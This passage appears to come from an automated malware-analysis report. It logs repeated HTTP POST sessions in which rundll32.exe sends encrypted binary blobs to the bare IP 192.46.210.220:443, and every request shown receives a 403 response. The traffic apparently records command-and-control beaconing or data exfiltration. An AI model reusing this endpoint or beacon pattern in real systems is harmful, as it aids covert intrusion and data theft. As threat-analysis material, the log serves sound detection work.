                                                                                                              2021-10-28 02:51:05 UTC314OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:05 UTC319INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:05 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              64192.168.2.450113192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:08 UTC319OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:08 UTC319OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:09 UTC329INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:09 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              65192.168.2.450114192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:09 UTC324OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:09 UTC324OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:09 UTC329INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:09 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              66192.168.2.450121192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:12 UTC329OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:12 UTC329OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:13 UTC339INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:13 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              67192.168.2.450122192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:13 UTC334OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:13 UTC334OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:13 UTC339INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:13 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              68192.168.2.450128192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:16 UTC339OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:16 UTC339OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:17 UTC349INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:16 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              69192.168.2.450130192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:16 UTC344OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:16 UTC344OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:17 UTC349INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:17 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              7192.168.2.449809192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:14 UTC34OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:14 UTC35OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:15 UTC39INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:15 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              70192.168.2.450136192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:20 UTC349OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:20 UTC349OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:20 UTC359INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:20 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              71192.168.2.450138192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:20 UTC354OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:20 UTC354OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:21 UTC359INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:21 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              72192.168.2.450144192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:24 UTC359OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:24 UTC359OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:25 UTC369INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:25 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              73192.168.2.450146192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:25 UTC364OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:25 UTC364OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:25 UTC369INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:25 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              74192.168.2.450153192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:28 UTC369OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:28 UTC369OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:29 UTC379INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:29 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              75192.168.2.450154192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:29 UTC374OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
